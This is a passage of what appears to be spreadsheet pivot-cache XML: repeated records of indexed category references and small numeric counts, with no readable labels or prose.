  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="819"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="819"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="820"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="820"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="79"/>
    <x v="820"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="404"/>
    <x v="820"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="820"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="820"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="820"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="822"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="822"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="822"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="822"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="822"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="822"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="821"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="821"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="821"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="821"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="821"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="823"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="823"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="8"/>
    <x v="823"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="823"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="824"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="824"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="824"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="824"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="824"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="824"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="824"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="824"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="824"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="825"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="825"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="825"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="825"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="825"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="825"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="2"/>
    <x v="826"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="7"/>
    <x v="826"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="826"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="826"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="826"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="826"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="826"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="826"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="827"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="827"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="827"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="827"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="828"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="828"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="828"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="828"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="5"/>
    <x v="828"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="828"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="828"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="828"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="827"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="827"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="829"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="829"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="829"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="829"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="829"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="829"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="829"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="830"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="830"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="830"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="830"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="830"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="830"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="830"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="830"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="830"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="831"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="831"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="831"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="831"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="535"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="17"/>
    <x v="832"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="832"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="11"/>
    <x v="832"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="832"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="832"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="832"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="832"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="814"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="833"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="833"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="833"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="833"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="833"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="834"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="834"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="69"/>
    <x v="834"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="49"/>
    <x v="834"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="834"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="834"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="834"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="835"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="38"/>
    <x v="835"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="29"/>
    <x v="835"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="835"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="835"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="835"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="835"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="835"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="836"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="836"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="836"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="836"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="836"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="836"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="38"/>
    <x v="836"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="21"/>
    <x v="836"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="836"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="836"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="836"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="836"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="836"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="836"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="837"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="837"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="837"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="837"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="837"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="837"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="837"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="837"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="837"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="837"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="837"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="837"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="837"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="837"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="838"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="838"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="33"/>
    <x v="838"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="838"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="838"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="838"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="839"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="839"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="29"/>
    <x v="839"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="22"/>
    <x v="839"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="839"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="840"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="840"/>
